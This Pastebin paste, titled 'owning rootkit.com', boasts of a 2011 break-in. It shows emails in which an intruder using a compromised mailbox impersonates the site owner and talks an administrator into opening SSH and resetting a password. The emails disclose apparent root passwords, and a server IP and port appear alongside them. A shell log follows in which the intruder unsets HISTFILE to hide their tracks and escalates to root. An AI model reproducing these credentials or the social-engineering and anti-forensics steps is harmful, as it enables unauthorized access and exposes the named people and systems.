Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

owning rootkit.com

By: a guest on Feb 8th, 2011  |  syntax: None  |  size: 2.51 KB  |  views: 26,494  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. How to get root on rootkit.com?
  2.  
  3. Quite simple, providing:
  4.  
  5. - you have access to greg's email account
  6. - the admin at your server is  the chief security specialist for Nokia
  7.   (http://www.spoke.com/info/p30H9Zc/JussiJaakonaho)
  8.  
  9. --------------------------------------------------------------------------------
  10.  
  11. From: Greg Hoglund <greg@hbgary.com> ISun, Feb 6, 2011 at 1:59 PM
  12. To: jussi <jussij@gmail.com>
  13.  
  14. im in europe and need to ssh into the server. can you drop open up
  15. firewall and allow ssh through port 59022 or something vague?
  16. and is our root password still 88j4bb3rw0cky88 or did we change to
  17. 88Scr3am3r88 ?
  18. thanks
  19.  
  20. From: jussi jaakonaho <jussij@gmail.com> ISun, Feb 6, 2011 at 2:06 PM
  21. To: Greg Hoglund <greg@hbgary.com>
  22.  
  23. hi, do you have public ip? or should i just drop fw?
  24. and it is w0cky - tho no remote root access allowed
  25.  
  26. From: Greg Hoglund <greg@hbgary.com> ISun, Feb 6, 2011 at 2:08 PM
  27. To: jussi jaakonaho <jussij@gmail.com>
  28.  
  29. no i dont have the public ip with me at the moment because im ready
  30. for a small meeting and im in a rush.
  31. if anything just reset my password to changeme123 and give me public
  32. ip and ill ssh in and reset my pw.
  33.  
  34. From: jussi jaakonaho <jussij@gmail.com> ISun, Feb 6, 2011 at 2:10 PM
  35. To: Greg Hoglund <greg@hbgary.com>
  36. ok,
  37. takes couple mins, i will mail you when ready. ssh runs on 47152
  38.  
  39. ...a little later:
  40.  
  41. bash-3.2# ssh hoglund@65.74.181.141 -p 47152
  42. [unauthorized access prohibited]
  43. hoglund@65.74.181.141's password:
  44. [hoglund@www hoglund]$ unset
  45. hoglund@www hoglund]$ w
  46. 11:23:50  up 30 days,  5:45,  4 users,  load average: 0.00, 0.00, 0.00
  47. USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
  48. jussi    pts/0    cs145060.pp.htv. Wed11pm 59.00s  0.38s  0.35s  screen -r
  49. jussi    pts/1    -                Thu 5am  1:13   0.38s  4.90s  SCREEN
  50. jussi    pts/2    -                Thu 5am 59.00s  0.68s  4.90s  SCREEN
  51. hoglund  pts/3    132.181.74.65.st 11:23am  0.00s  0.03s  0.00s  w
  52. [hoglund@www hoglund]$ unset HIST
  53. [hoglund@www hoglund]$ unset HISTFLE
  54. [hoglund@www hoglund]$ unset HISTFILE
  55. [hoglund@www hoglund]$ uname -a;hostname
  56. Linux www.rootkit.com 2.4.21-40.ELsmp #1 SMP Wed Mar 15 14:21:45 EST 2006 i686 i686 i386 GNU/Linux
  57. www.rootkit.com
  58. [hoglund@www hoglund]$ su -
  59. Password:
  60. [root@www root]# unset HIST
  61. [root@www root]# unset HISTFILE
  62. [root@www root]# uname -a;hostname;id
  63. Linux www.rootkit.com 2.4.21-40.ELsmp #1 SMP Wed Mar 15 14:21:45 EST 2006 i686 i686 i386 GNU/Linux
  64. www.rootkit.com
  65. uid=0(root) gid=0(root) groups=0(root),1200(varmistus)